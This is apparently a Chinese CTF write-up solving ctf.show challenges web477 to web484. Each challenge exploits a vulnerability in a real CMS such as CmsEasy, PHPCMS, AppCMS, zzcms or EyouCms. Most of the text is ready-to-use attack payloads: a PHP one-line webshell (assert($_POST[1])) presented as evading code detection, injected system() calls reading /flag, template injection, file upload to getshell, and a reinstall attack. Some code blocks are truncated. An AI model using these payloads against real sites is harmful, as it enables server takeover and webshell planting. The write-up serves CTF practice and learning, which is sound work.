web477
easycms:CmsEasy_v5.7 漏洞测试-腾讯云开发者社区-腾讯云
登录后台,模板–自定义标签—添加自定义标签–填写Payload—提交:
Payload: 1111111111";}<?php phpinfo()?>
附绕代码检测的一句话Payload: 11";}<?php assert($_POST[1]);?>
执行phpinfo()即可获得flag
web478
参考链接:PHPCMS v9.6.0 任意文件上传漏洞分析 - FreeBuf网络安全行业门户
文件上传+远程包含。
登陆界面路由:
1 | https://e14bfd1a-41b9-4a2c-9d25-3b3e99c52de4.challenge.ctf.show/index.php?m=member&c=index&a=register&siteid=1 |
照着rce即可
注意:每跑一次payload需要修改用户名和邮箱,不然由于用户名存在会报错。
web479
参考链接:ICMSv7.0.1 admincp.class.php sql注入分析 | Chybeta
生成cookie:
1 | <?php |
进入后台获得flag。
web480
源码解释:
1 | <?php |
payload:?conf[CURRENTCONFIGNAME]=");?>%0a<?php%20system(%27cat%20/flag%27);?>
解释:saveValues函数中,末尾函数是漏洞的:
1 | if ($configname == '') { |
原本应该生成:
1 | <?php |
在payload下生成:
1 | <?php |
从而得到flag。
web481
1 | appcms 2.0.* |
参考链接:AppCMS 2.0.101 后门分析 | Chybeta
payload:
1 | POST /?session=ctfshow&url=php://input&cms=shell.php |
然后访问shell.php即可getshell
web482
zzcms重装漏洞
参考链接:zzcms v8.1审计-腾讯云开发者社区-腾讯云
post传参step=2,直接重装获得flag。
同时也可以通过修改数据库名称实现rce。
web483
在栏目添加功能处增加栏目${system($_GET[1])}
然后访问/data/guide_fid.php?1=tac%20/flag即可获得flag
web484
参考链接:EyouCms前台GetShell漏洞复现_eyoucms漏洞-CSDN博客
1 | POST /index.php/api/uploadify/preview HTTP/1.1 |